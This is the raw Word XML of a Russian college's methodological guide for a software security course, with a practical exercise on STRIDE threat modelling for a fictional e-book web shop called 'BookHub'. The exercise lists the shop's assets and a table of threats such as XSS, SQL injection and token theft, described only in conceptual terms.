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BF18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hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="111115"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Министерство образования Красноярского края</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670DD96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11141B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B66CA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17874E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529A9C5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BAF6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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8AB6BB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3516C4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35B4D815">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111115"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111115"/>
        </w:rPr>
        <w:t>МЕТОДИЧЕСКИЕ РЕКОМЕНДАЦИИ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D27F1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1746DC15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По профессиональному модулю </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6F3BE1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>ПМ.02 Разработка и интеграция модулей программного обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1AF1E1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МДК.02.06 </w:t>
      </w:r>
      <w:r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  <w:t>Безопасность программного обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C05AEA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</w:p>
    <w:p w14:paraId="19126D4D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Курс ____</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5B95AD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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A5CAD0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Для специальности </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9D1823">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman Regular" w:hAnsi="Times New Roman Regular" w:cs="Times New Roman Regular"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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0A0A0A"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>09.02.11 "</w:t>
      </w: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111115"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Разработка и управление программным обеспечением”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702ABECE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53D0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12E3A2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78EC97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5B19263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EDBB8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E4CE8A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787708A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1F55E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4D421A2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10BB4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F4E96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4FF5038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FA29F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65145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605B6CE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C4060D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D1455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7BF197BD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15AAC3E1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  <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="111115"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5329534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6189A4B6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t>Красноярск, 2025</w:t>
      </w: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47DB742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220"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Методические рекомендации составлены:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EAA67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hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Преподавателем первой категории КГБПОУ СПО «ККРИТ» </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Т. С. Панариной</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D01A30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2D86EC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41DBDD4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74082E14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РАССМОТРЕНО</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DC9AB7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 заседании цикловой комиссии преподавателей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42285C9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профессионального цикла информационно-технического профиля</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2174B4F2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Протокол №___ от «___» ___________ 2025 г.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154E623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Председатель ЦК __________________ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>А. В. ТАтарников</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1A713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4076C67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27A7A702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5BEB5E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055C91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60F83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Ответственный редактор: зам. директора по учебной работе М.А. Полютова</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C24009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7C384D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171203C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2927567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652DBC8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Одобрено Методическим советом КГБПОУ СПО «ККРИТ»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A7171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протокол № __ от «___» ______ 2025 г.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732E55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Председатель методического совета</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53896E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4699"/>
        </w:tabs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Зам. директора по УР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 М.А. Полютова</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5D9D37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4653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49E7A496"/>
    <w:p w14:paraId="56A1E628"/>
    <w:p w14:paraId="1C077A4E"/>
    <w:p w14:paraId="65EBB9C8"/>
    <w:p w14:paraId="1F431762"/>
    <w:p w14:paraId="6BE4C964"/>
    <w:p w14:paraId="430EE369"/>
    <w:p w14:paraId="2D370425"/>
    <w:p w14:paraId="32A6C07B"/>
    <w:p w14:paraId="4232FBA3"/>
    <w:p w14:paraId="38EC6499"/>
    <w:p w14:paraId="5FDC06E4"/>
    <w:p w14:paraId="17013358"/>
    <w:p w14:paraId="241B7AA2"/>
    <w:p w14:paraId="292DE52D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F1F43D9">
      <w:pPr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14591F46">
      <w:pPr>
        <w:pStyle w:val="25"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-567" w:right="-285" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ПРАКТИЧЕСКАЯ РАБОТА № 1. СОСТАВЛЕНИЕ МОДЕЛИ УГРОЗ (THREAT MODEL) ДЛЯ ТИПОВОГО ВЕБ-ПРИЛОЖЕНИЯ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A11859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</w:p>
    <w:p w14:paraId="65BC551E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Цель работы:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>освоить методологию моделирования угроз на примере типового веб-приложения, научиться идентифицировать активы, векторы атак и разрабатывать контрмеры.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051A3B9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1. Определение объекта моделирования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6DB619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/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Название приложения:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>"BookHub" — онлайн-библиотека/магазин электронных книг.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEFC289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/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Цель приложения:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Пользователи могут регистрироваться, искать, покупать, читать и рецензировать электронные книги.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3206D95D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/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ключевые функции:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCD8539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Регистрация, аутентификация и управление профилем пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267CBDA4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Просмотр каталога книг (с фильтрами и поиском).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A83FF91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Добавление книг в корзину и онлайн-оплата.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F01FFD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Чтение книг через встроенный веб-ридер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B07FD3C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Написание рецензий и рейтингов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8AB5D9">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-285"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Административная панель для управления книгами, пользователями и заказами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFF939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2. Выбор методологии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACE399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Используем популярную и наглядную методологию STRIDE, классифицируя угрозы по категориям:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348403A3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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Spoofing (Спуфинг, маскировка)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478C5D61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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Tampering (Фальсификация, изменение данных)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE731EB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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Repudiation (Отказ от действий)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367302DA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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Information Disclosure (Раскрытие информации)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7541300C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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Denial of Service (Отказ в обслуживании)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DD27CE">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="-285"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Elevation of Privilege (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Повышение</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>привилегий</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668495F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3. Декомпозиция приложения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0779F608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</w:rPr>
        <w:t>Строим упрощённую схему данных (Data Flow Diagram, DFD) в текстовом виде:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8F1E1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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5839460" cy="3380740"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="206251607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516078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9460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AF1A3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Ключевые активы (Assets):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2634F03B">
      <w:pPr>
        <w:pStyle w:val="10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Данные:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>База данных пользователей (логины, хэши паролей, email, платежные данные, история покупок), электронные книги (контент).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F0BE34">
      <w:pPr>
        <w:pStyle w:val="10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Функциональность:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Процесс оплаты, система аутентификации, механизм выдачи книг для чтения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BDC8A0">
      <w:pPr>
        <w:pStyle w:val="10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Репутация:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Доверие клиентов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0FB313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4. Выявление и классификация угроз (STRIDE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1455AA2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Составим таблицу угроз для ключевых компонентов.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="18"/>
        <w:tblW w:w="10201" w:type="dxa"/>
        <w:tblInd w:w="-56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1"/>
        <w:gridCol w:w="1985"/>
        <w:gridCol w:w="3402"/>
        <w:gridCol w:w="3543"/>
      </w:tblGrid>
      <w:tr w14:paraId="030C1DC3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57A9D4AE">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567"/>
              </w:tabs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Компонент</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2950FEB0">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567"/>
              </w:tabs>
              <w:ind w:right="35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Угроза (по STRIDE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="234779DC">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567"/>
              </w:tabs>
              <w:ind w:right="101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Описание</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3543" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="081AB12F">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567"/>
              </w:tabs>
              <w:ind w:right="3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Вектор атаки</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1F71C0A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02DE7279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Веб-интерфейс (SPA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2ADA3B04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Tampering (Фальсификация)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1116D5A1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Злоумышленник может модифицировать код/данные на стороне клиента (JavaScript).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3543" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="340E30C5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XSS-атака (Cross-Site Scripting), позволяющая изменить DOM, перехватить ввод.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3EBDC9A3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B9A4964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08FE4A9D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Information Disclosure (Раскрытие)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E811D43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Утечка чувствительных данных (токены, персональная информация) через уязвимости в коде клиента.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3543" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A4C5DF8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Небезопасное хранение токенов в localStorage, утечка через логи фронтенда.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="63C94BA9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13DB9EDB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API-сервер</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B69EB68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Spoofing (Спуфинг)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5978E94B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Незаконное использование сессий или токенов других пользователей.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3543" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E9ACD79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Подбор или кража сессионного токена, недостаточная инвалидация сессии.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="11372876">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D70B262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477834CA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Elevation of Privilege (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Повышение</w:t>
            </w:r>
            <w:r>
              <w:rPr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</w:rPr>
              <w:t>прав</w:t>
            </w:r>
            <w:r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3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="698E0564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Пользователь получает доступ к функционалу администратора (например, к API /admin/delete-user).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3543" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0871CFA2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Недостаточная проверка прав на уровне API (Broken Object Level Authorization).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="52D3A031">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61E589D4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3DE57DD1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Denial of Service (Отказ в обслуживании)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28189D62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API-сервер перегружен запросами и становится недоступным для легитимных пользователей.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3543" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="535A8600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DDoS-атака, атака на ресурсоёмкие операции (например, сложный поиск по книгам без лимитов).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1A5A4DD9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54762CC1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База данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="549FB942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Tampering (Фальсификация)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E930E51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Прямое изменение или удаление данных в БД.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3543" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A98FE23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SQL-инъекция через невалидированные параметры API.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6BDD0161">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4DFA4F93">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567"/>
              </w:tabs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6CB88A1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Information Disclosure (Раскрытие)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1945543E">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567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Чтение чувствительных данных из БД (пароли, платёжные данные).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3543" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13BD9A81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Успешная SQL-инъекция, неправильно настроенные права доступа к БД.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1244C1F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A4B9755">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567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Процесс оплаты</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20F970E5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Spoofing (Спуфинг)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C6CD2F1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Подделка успешного платежа, чтобы получить книгу без оплаты.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3543" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15E5218C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Прямой вызов callback-URL платежного шлюза или манипуляция с данными на стороне клиента перед отправкой.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0F3138FF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78F5CAD5">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567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0873498B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Repudiation (Отказ)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="49D8FCC9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Пользователь утверждает, что не совершал покупку, хотя деньги были списаны.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3543" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24669A11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Отсутствие надёжного аудита и нефальсифицируемых логов на стороне приложения и интеграции с платёжным шлюзом.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2474B547">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26584E86">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567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Хранилище файлов (S3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24C930F7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Information Disclosure (Раскрытие)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="556835BE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Прямой доступ к файлам книг без авторизации (утечка платного контента).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3543" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19E294D7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Неправильно настроенные политики доступа к бакету S3 (публичный доступ).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5F4C23DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3935DCF0">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567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 связи</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6269A50C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Spoofing / Information Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09EDB09A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Перехват данных между клиентом и сервером (Man-in-the-Middle).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3543" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E9CC55B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Отсутствие HTTPS, использование устаревших версий TLS, небезопасные cookie (без флагов Secure и HttpOnly).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="456B9D1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</w:p>
